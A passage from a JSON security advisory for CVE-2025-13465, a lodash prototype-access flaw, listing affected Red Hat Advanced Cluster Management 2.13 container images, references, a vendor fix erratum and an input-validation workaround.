"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T02:15:09+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8229"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
